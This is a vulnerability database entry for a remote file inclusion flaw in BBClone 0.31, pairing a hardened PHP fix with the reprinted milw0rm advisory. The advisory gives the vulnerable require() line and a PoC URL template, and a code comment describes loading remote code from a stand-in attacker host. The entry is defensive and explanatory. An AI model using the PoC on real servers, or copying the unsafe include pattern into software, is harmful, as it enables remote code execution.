BBClone 'selectlang.php' Remote File Inclusion Vulnerability

Vulnerability ID 1112063 Vulnerability type Unknown
Published 2007-01-23 Updated 2007-01-25
CVE ID CVE-2007-0508 CNNVD ID CNNVD-200701-442
Platform PHP CVSS score 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/3183
https://www.securityfocus.com/bid/86738
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-442
|Vulnerability details
BBClone 0.31 contains a PHP remote file inclusion vulnerability in lib/selectlang.php. The script passes the BBC_LANGUAGE_PATH variable straight into require(), so a remote attacker who can set that variable from the request (the published PoC supplies it as a GET parameter) can point it at a URL under their control and execute arbitrary PHP code on the server.
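The following is an added example written for this page; it is not BBClone's code and not part of the original advisory. It sets the one-line pattern quoted in the exploit next to a hardened replacement. Assumptions are marked as such: that the request parameter becomes $BBC_LANGUAGE_PATH through register_globals (or an equivalent extract() of $_GET), that allow_url_include/allow_url_fopen permit remote URLs in require(), that the language files live in a sibling language/ directory, and that the guard constant BBC_LOADED_VIA_INDEX is a hypothetical name defined by the application's entry page.

```php
<?php
// Added example, not BBClone's own code.
//
// Vulnerable pattern as quoted in the advisory (not executed here):
//     require($BBC_LANGUAGE_PATH . $BBC_LANGUAGE . ".php");
// Assumption: register_globals (or an extract() of $_GET) lets a request
// parameter populate $BBC_LANGUAGE_PATH, and allow_url_include/allow_url_fopen
// are on. With BBC_LANGUAGE_PATH=http://attacker.example/ and BBC_LANGUAGE
// unset, PHP fetches and executes http://attacker.example/.php; a trailing
// "?" in the supplied URL turns the ".php" suffix into a query string, so
// any remote file name works.

// 1. Refuse direct requests: only the application entry point may include
//    this file. BBC_LOADED_VIA_INDEX is a hypothetical guard constant that
//    the entry page would define before including lib/selectlang.php.
if (!defined('BBC_LOADED_VIA_INDEX')) {
    http_response_code(403);
    exit;
}

// 2. The language directory is fixed at install time and never taken from
//    user input. Assumed layout: lib/../language/.
$langDir = __DIR__ . '/../language/';

/**
 * Resolve a requested language code to a file inside $langDir, or fall back
 * to $default. Only a short lowercase token is accepted, and the resolved
 * real path must stay inside the real path of $langDir, so neither a URL
 * nor a traversal sequence can reach require().
 */
function bbc_select_language(string $requested, string $langDir, string $default = 'en'): string
{
    if (!preg_match('/^[a-z]{2,8}$/', $requested)) {
        $requested = $default;
    }

    $base = realpath($langDir);
    $real = realpath($langDir . $requested . '.php');

    if ($base === false
        || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        $real = realpath($langDir . $default . '.php');
        if ($real === false) {
            throw new RuntimeException('default language file missing in ' . $langDir);
        }
    }
    return $real;
}

// 3. The only user-influenced value is the language code, and it is
//    validated before it gets anywhere near require().
$requested = isset($_GET['BBC_LANGUAGE']) ? (string) $_GET['BBC_LANGUAGE'] : 'en';
require bbc_select_language($requested, $langDir);
```

The two checks that matter are the direct-access guard and the realpath containment test: the guard removes the attack surface the PoC uses (hitting lib/selectlang.php on its own), and the containment test means that even if a variable is later repurposed, only a file already present under language/ can be included. Disabling register_globals and allow_url_include in php.ini is the server-side counterpart and should be done regardless of the application fix.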
|Exploit
------------------------------------------------------------------------------------------------------------------------
Script:bbclone
Affected Version:0.31
Download:http://sindominio.net/ayuda/bbclone-0.31-esp.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lib/selectlang.php)
Vul Code:
require($BBC_LANGUAGE_PATH . $BBC_LANGUAGE . ".php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lib/selectlang.php?BBC_LANGUAGE_PATH=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-23]
|Affected products
BBClone BBClone 0.31
|References

Source: MILW0RM
Name: 3183
Link: http://www.milw0rm.com/exploits/3183
Source: VUPEN
Name: ADV-2007-0318
Link: http://www.frsirt.com/english/advisories/2007/0318
Source: SECUNIA
Name: 23874
Link: http://secunia.com/advisories/23874
Source: OSVDB
Name: 32957
Link: http://osvdb.org/32957